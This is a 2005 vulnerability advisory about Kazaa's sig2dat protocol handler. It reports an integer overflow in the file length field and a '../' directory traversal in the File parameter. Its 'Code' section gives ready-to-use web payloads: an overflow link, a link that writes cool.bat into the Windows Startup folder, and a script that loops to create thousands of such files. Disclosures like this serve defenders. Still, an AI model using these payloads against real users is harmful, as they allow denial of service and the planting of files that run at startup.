~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application: Kazaa Vendors: http://www.kazaa.com Versions: kazaa lite k++(probably all others too...) Platforms: Windows Bug: Sig2Dat Protocol Remote Integer Overflow and Denial Of Service by creating files in arbitrary locations Exploitation: Remote With Browser Date: 17 Jan 2005 Author: Rafel Ivgi, The-Insider E-Mail: the_insider@xxxxxxxx Website: http://theinsider.deep-ice.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1) Introduction 2) Bugs 3) The Code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============== 1) Introduction =============== Kazaa is currently the world’s most common P2P file sharing application. When installing Kazaa a new protocol is installed named “sig2dat”. This protocol contain an integer overflow vulnerability which may cause a crash and may allow remote execution of code. There is another vulnerability in the “File:” parameter which allows creating files in arbitrary locations and committing Denial Of Service. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ====== 2) Bug ====== The sig2dat protocol syntax: Sig2dat://<filename>%7c<file length in bytes>< file length in kilobytes>%7c<HASH>%7c The vulnerable parameter is the file “Length” (in bytes). Specifying a numeric value bigger than a 999999999. Successful exploiting of this vulnerability may allow remote code execution. There is another vulnerability in the “File:” parameter. It allows creation of files in arbitrary locations within the same partition as the shared folder, using the classic directory transversal technique “../”. For Example: <A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/ Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEf m3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =========== 3) The Code =========== 1) <A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:99999999999999999999 9999999%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A> ********************************************************************* 2) <A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu /Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEf m 3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A> ********************************************************************* 3) <script> var i for (i=1;i<10000;i++) { mylocation="<iframe src='sig2dat://%7CFile:../../../../../../Docume~1/All Users /Start Menu/Programs/Startup/cool"+i+".bat%7CLength:373236528%20Bytes,364489KB% 7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'></iframe>"; document.write(mylocation); } </script> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --- Rafel Ivgi, The-Insider http://theinsider.deep-ice.com "Scripts and Codes will make me D.O.S , but they will never HACK me."
